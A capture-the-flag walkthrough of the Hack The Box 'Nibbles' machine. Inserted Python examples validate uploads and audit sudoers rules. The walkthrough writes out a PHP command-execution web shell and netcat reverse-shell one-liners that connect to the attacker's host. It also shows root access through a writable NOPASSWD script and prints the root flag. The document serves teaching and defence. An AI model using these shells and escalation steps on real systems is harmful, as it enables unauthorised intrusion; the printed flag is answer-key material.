#linux #hackthebox #easy

![[Pasted image 20250611221947.png]]

# Nmap - Enumeration

Initial port scanning result (all ports 1~65,535):

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS 10.10.10.75 -Pn -n --open -p- -oN tcpall
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:53 CDT
Nmap scan report for 10.10.10.75
Host is up (0.051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
```

A more detailed scan is performed on the discovered ports, 22 and 80:

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV 10.10.10.75 -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:54 CDT
Nmap scan report for 10.10.10.75
Host is up (0.052s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
```

# Footprinting

Navigated to the webpage `10.10.10.75`; its page source revealed the presence of the `/nibbleblog` directory.

![[Pasted image 20250611205820.png]]

I ran `Gobuster` to enumerate directories and files on `10.10.10.75/nibbleblog`. It revealed several interesting directories and files.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 301]
/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 402]
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php             (Status: 200) [Size: 302]
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php          (Status: 200) [Size: 78]
/update.php           (Status: 200) [Size: 1622]
/README               (Status: 200) [Size: 4628]
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/LICENSE.txt          (Status: 200) [Size: 35148]
```

`/admin.php` presented a login page where `admin:nibbles` worked as valid credentials.

![[Pasted image 20250611211703.png]]

This is how the Nibbleblog dashboard looks after logging in as admin:

![[Pasted image 20250611212022.png]]

In the `Settings` tab, scroll all the way to the bottom to find the Nibbleblog version, which is **4.0.3**.

![[Pasted image 20250611212148.png]]

In the `Plugins` tab, I found a feature that allows file uploads.
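The rest of this section hinges on that upload feature keeping whatever extension the client supplies and on the web server executing PHP out of the upload directory. As an added example (not code from the write-up or from Nibbleblog itself), the following Python handler shows the checks a hardened version of such a plugin would make before storing a file: an extension allowlist, magic-byte agreement with the declared type, rejection of any PHP open tag anywhere in the body (which also catches an image with a script appended), and a stored name derived from the allowlist rather than from the client. The signature table, the sample uploads and the `validate_upload` name are assumptions of this example.

```python
import re

# Allowlist of image types this handler will store, mapped to the leading magic
# bytes each format must begin with (constructed for this example).
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Any PHP open tag anywhere in the body, so a genuine JPEG header with PHP
# appended (a polyglot) is rejected just like a bare script.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# The plugin in the write-up stores every upload as image.<client extension>.
# Here the stored extension comes from the allowlist entry, never from the client.
STORED_BASENAME = "image"


def validate_upload(filename, data):
    """Decide whether an upload may be stored.

    Returns (True, stored_name) when the file passes every check, or
    (False, reason) naming the first check that failed.
    """
    if "." not in filename:
        return False, "no extension"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension not allowed: .{ext}"
    if not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, "content does not match declared image type"
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag"
    canonical_ext = "jpg" if ext == "jpeg" else ext
    return True, f"{STORED_BASENAME}.{canonical_ext}"


# Constructed sample uploads: a minimal JPEG-like body, a PNG-like body, a bare
# PHP script, the same script renamed to .jpg, and a JPEG/PHP polyglot.
SAMPLES = {
    "real_jpeg": ("cat.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 12),
    "real_png": ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 12),
    "php_script": ("cmd.php", b"<?php echo 'hi'; ?>"),
    "php_as_jpg": ("cat.jpg", b"<?php echo 'hi'; ?>"),
    "polyglot": ("cat.jpg", b"\xff\xd8\xff\xe0" + b"<?php echo 'hi'; ?>"),
}


def run_samples():
    """Apply validate_upload to every constructed sample; returns {name: (accepted, detail)}."""
    return {name: validate_upload(fn, body) for name, (fn, body) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (accepted, detail) in run_samples().items():
        print(f"{name:12s} {'stored as ' + detail if accepted else 'rejected: ' + detail}")
```

Content validation alone is not the whole fix: even a perfect allowlist is undone if the server will interpret anything it finds under `content/private/plugins/`. The complementary server-side control is to turn script execution off for the upload tree (with mod_php that is `php_admin_flag engine off` inside a `<Directory>` block for that path, or serving uploads from a location with no PHP handler at all), so a file that slips through is returned as bytes rather than run.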
I believe this can be leveraged to gain an initial foothold.

![[Pasted image 20250611212614.png]]

First, I uploaded an image file to test where the images are saved. Then I clicked the `View Blog` button and noticed that the `MY IMAGE` section had been updated.

![[Pasted image 20250611213847.png]]

![[Pasted image 20250611213922.png]]

You can right-click on the uploaded image and select 'Open image in new tab', which opens a new browser tab with the following URL: `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.jpg`. As shown in the URL, the server renamed the uploaded file to `image.jpg`; the original filename was `cat.jpg`.

Based on the previous test results, I created a file containing a simple PHP one-liner `<?php system($_GET['cmd']); ?>` and uploaded it as `cmd.php`. Then I navigated to `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/cmd.php?cmd=id`, but it returned **Not Found**. After changing the filename in the URL to `image.php`, the command executed successfully.

![[Pasted image 20250611214933.png]]

Now it's time to get our reverse shell. I updated my `cmd.php` to make it connect back to us.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat cmd.php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f"); ?>

┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
```

Got the shell!

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 39358
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
```

Found `user.txt`:

```bash
nibbler@Nibbles:/home/nibbler$ cat user.txt
cb8c...
```

# PrivEsc

The `sudo -l` command revealed that the user `nibbler` can run the following commands as `root`.
```bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

We can modify `monitor.sh` in the `stuff` directory to contain another reverse shell that connects back to me and grants a shell as `root`.

```bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1235 >/tmp/f
```

Run the following command to fire up the reverse shell:

`sudo /home/nibbler/personal/stuff/monitor.sh`

Connected as `root` and found `root.txt`:

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1235
listening on [any] 1235 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 40764
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
21643b4fbcc4d4e1854077397e4d9ee0
```
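The rule that hands over root here is a textbook sudoers misconfiguration: `NOPASSWD` on a script that sits inside a directory the unprivileged user owns, so the user controls what root executes. As an added example (not part of the original write-up), the Python audit below parses `sudo -l`-style output, and for each `NOPASSWD` command walks the target path and every ancestor directory, flagging any component the user could write. It judges writability from owner and mode bits rather than `os.access()` (which root bypasses) and treats sticky directories such as `/tmp` as safe from substitution. The `demo()` function builds a constructed copy of the `personal/stuff/monitor.sh` layout in a temporary directory; the paths, the `sudo -l` text and the uid/gids it uses are assumptions of the example.

```python
import os
import re
import stat
import tempfile

# Matches the "(root) NOPASSWD: /path/to/cmd" lines that `sudo -l` prints.
NOPASSWD_RULE = re.compile(r"\((?P<runas>[^)]+)\)\s+NOPASSWD:\s*(?P<cmd>\S+)")


def parse_nopasswd_rules(sudo_l_output):
    """Return (runas, command_path) for every NOPASSWD rule in `sudo -l` output."""
    return [(m.group("runas"), m.group("cmd")) for m in NOPASSWD_RULE.finditer(sudo_l_output)]


def user_can_write(path, uid, gids):
    """Judge writability from ownership and mode bits, not os.access() (root bypasses it)."""
    st = os.stat(path)
    mode = st.st_mode
    if st.st_uid == uid:
        return True  # the owner can always chmod, so ownership alone is enough
    # A sticky directory (e.g. /tmp) lets others create entries but not rename
    # or delete someone else's, so it does not let the user swap the script out.
    if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        return False
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def writable_components(path, uid, gids):
    """Return the target and every ancestor directory the user can write.

    A writable ancestor is as serious as a writable target: the user can move
    the script aside and place their own file at the same path.
    """
    findings = []
    cur = os.path.abspath(path)
    while True:
        if os.path.lexists(cur) and user_can_write(cur, uid, gids):
            findings.append(cur)
        parent = os.path.dirname(cur)
        if parent == cur:
            break
        cur = parent
    return findings


def demo():
    """Constructed layout mirroring the write-up: a NOPASSWD rule on a script
    under the unprivileged user's own home. Returns the audit findings."""
    home = tempfile.mkdtemp(prefix="nibbler_home_")
    stuff_dir = os.path.join(home, "personal", "stuff")
    os.makedirs(stuff_dir)
    script = os.path.join(stuff_dir, "monitor.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\necho monitoring\n")
    os.chmod(script, 0o755)

    # Constructed `sudo -l` output in the same shape as the real one.
    sudo_l = (
        "User nibbler may run the following commands on Nibbles:\n"
        f"    (root) NOPASSWD: {script}\n"
    )
    uid = os.getuid()
    gids = set(os.getgroups()) | {os.getgid()}
    report = [
        {"runas": runas, "command": cmd, "writable": writable_components(cmd, uid, gids)}
        for runas, cmd in parse_nopasswd_rules(sudo_l)
    ]
    return {"script": script, "stuff_dir": stuff_dir, "report": report}


if __name__ == "__main__":
    for finding in demo()["report"]:
        status = "UNSAFE" if finding["writable"] else "ok"
        print(f"[{status}] ({finding['runas']}) NOPASSWD: {finding['command']}")
        for p in finding["writable"]:
            print(f"         user-writable: {p}")
```

The remediation the audit points at is straightforward: a script that must run as root via sudo belongs in a root-owned directory with a root-owned, non-group/world-writable file (mode 0755 under a path like `/usr/local/sbin`), and the sudoers rule should reference that path; a rule pointing into a user's home directory should simply be removed.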